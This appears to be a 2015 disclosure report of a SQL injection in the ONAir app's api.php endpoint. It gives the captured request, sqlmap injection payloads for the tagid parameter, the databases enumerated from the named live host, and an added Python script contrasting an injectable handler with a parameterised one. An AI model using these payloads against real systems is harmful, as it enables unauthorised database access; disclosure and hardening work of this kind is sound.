2015-05-21: Details have been sent to the vendor and are awaiting vendor handling. 2015-05-26: The vendor has chosen to ignore the vulnerability; details are now disclosed to the public.
ONAir is an app under Yunshi (云视). There is an interface at the path e/extend/client_api/api.php; this API appears to be the app's general-purpose interface, similar to vulnerability #2 that I submitted, but when it was fixed only the parameter I gave was patched, and the other parameters were not changed. Please take note of this. Once again, capture the packets and intercept the data:
POST /e/extend/client_api/api.php HTTP/1.1
Host: web5.cdvcloud.com
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 69
Connection: close
User-Agent: OnAir 1.0 (iPhone; iPhone OS 8.3; zh_CN)

act=get_vods&orderby=1&tagid=0&year=2015&i=1&sid=0&classid=6&mod=vod
Injection is present:
sqlmap identified the following injection points with a total of 315 HTTP(s) requests:
---
Place: POST
Parameter: tagid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: act=get_vods&orderby=1&tagid=0 AND (SELECT 4950 FROM(SELECT COUNT(*),CONCAT(0x3a6a67743a,(SELECT (CASE WHEN (4950=4950) THEN 1 ELSE 0 END)),0x3a65687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&year=2015&i=1&sid=0&classid=6&mod=vod

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: act=get_vods&orderby=1&tagid=0 UNION ALL SELECT CONCAT(0x3a6a67743a,0x74676e594172694c4264,0x3a65687a3a)#&year=2015&i=1&sid=0&classid=6&mod=vod
---
[13:10:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
[13:10:46] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\web5.cdvcloud.com'
[*] shutting down at 13:10:46
Databases:
available databases [9]:
[*] information_schema
[*] mysql
[*] security
[*] test
[*] ugc
[*] vms
[*] vms2_1
[*] zqcms
[*] zqcms_test
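The reporter's point is that the earlier fix covered only the single parameter named in the previous report, while the same endpoint keeps accepting the rest of the get_vods parameters unchecked, and sqlmap then found tagid injectable. The following Python script is an added illustration, not code from the original report, the vendor or the app: it contrasts a handler that splices request values into the SQL text with a hardened handler that whitelist-validates every parameter of the request shown above and binds them as query parameters. It uses an in-memory sqlite3 table as a stand-in for the app's MySQL data; the table, column and function names, and the sample rows, are constructed assumptions.

```python
import sqlite3

# Constructed sample data standing in for the app's VOD table (assumption:
# the real schema behind api.php is not on the page; sqlite3 stands in for MySQL).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE vod (id INTEGER, title TEXT, tagid INTEGER, classid INTEGER, year INTEGER)"
    )
    conn.executemany(
        "INSERT INTO vod VALUES (?,?,?,?,?)",
        [
            (1, "clip-a", 0, 6, 2015),
            (2, "clip-b", 3, 6, 2015),
            (3, "clip-c", 0, 2, 2014),
        ],
    )
    return conn

# Every parameter of the get_vods request that the captured body shows as numeric.
# Validating only tagid (the parameter sqlmap flagged) would repeat the vendor's mistake.
NUMERIC_PARAMS = ("orderby", "tagid", "year", "i", "sid", "classid")
ALLOWED_ACT = {"get_vods"}
ALLOWED_MOD = {"vod"}


class BadRequest(ValueError):
    """Raised when any request parameter fails the whitelist."""


def validate_get_vods(params):
    """Whitelist-validate every parameter, not just the one reported earlier."""
    if params.get("act") not in ALLOWED_ACT or params.get("mod") not in ALLOWED_MOD:
        raise BadRequest("unknown act/mod")
    clean = {}
    for name in NUMERIC_PARAMS:
        raw = params.get(name, "")
        # ASCII digits only, bounded length: rejects spaces, quotes, '#', and SQL keywords.
        if not (raw.isascii() and raw.isdigit()) or len(raw) > 9:
            raise BadRequest(f"parameter {name} must be a small non-negative integer")
        clean[name] = int(raw)
    return clean


def get_vods_vulnerable(conn, params):
    """Unsafe pattern: request values pasted into the SQL string, as the sqlmap run demonstrates for tagid."""
    sql = "SELECT id, title FROM vod WHERE tagid=%s AND classid=%s AND year=%s" % (
        params["tagid"], params["classid"], params["year"],
    )
    return [row[0] for row in conn.execute(sql)]


def get_vods_safe(conn, params):
    """Hardened pattern: validate all parameters, then bind them instead of interpolating."""
    clean = validate_get_vods(params)
    sql = "SELECT id, title FROM vod WHERE tagid=? AND classid=? AND year=?"
    return [row[0] for row in conn.execute(sql, (clean["tagid"], clean["classid"], clean["year"]))]


# The captured request body from the report, as a dict.
GOOD = {"act": "get_vods", "orderby": "1", "tagid": "0", "year": "2015",
        "i": "1", "sid": "0", "classid": "6", "mod": "vod"}
# Constructed tautology in tagid: enough to show the WHERE clause being rewritten.
INJECTED_TAGID = dict(GOOD, tagid="0 OR 1=1")
# Same tampering on a parameter the earlier fix did not touch.
INJECTED_CLASSID = dict(GOOD, classid="6 OR 1=1")

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, normal request:", get_vods_vulnerable(conn, GOOD))
    print("vulnerable, tampered tagid:", get_vods_vulnerable(conn, INJECTED_TAGID))
    print("safe, normal request:", get_vods_safe(conn, GOOD))
    for bad in (INJECTED_TAGID, INJECTED_CLASSID):
        try:
            get_vods_safe(conn, bad)
        except BadRequest as exc:
            print("safe, rejected:", exc)
```

The vulnerable handler returns one row for the genuine request but every row once tagid carries a tautology, because the spliced text changes the WHERE clause; the hardened handler returns the same single row and rejects tampering in tagid and classid alike before any SQL is built. Binding parameters is what removes the injection; the whitelist is defence in depth that also gives a clean 400-style rejection to log and alert on.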
Severity: No impact (vendor ignored)
Ignored at: 2015-05-26 15:38
Vulnerability Rank: 4 (WooYun rating)
None yet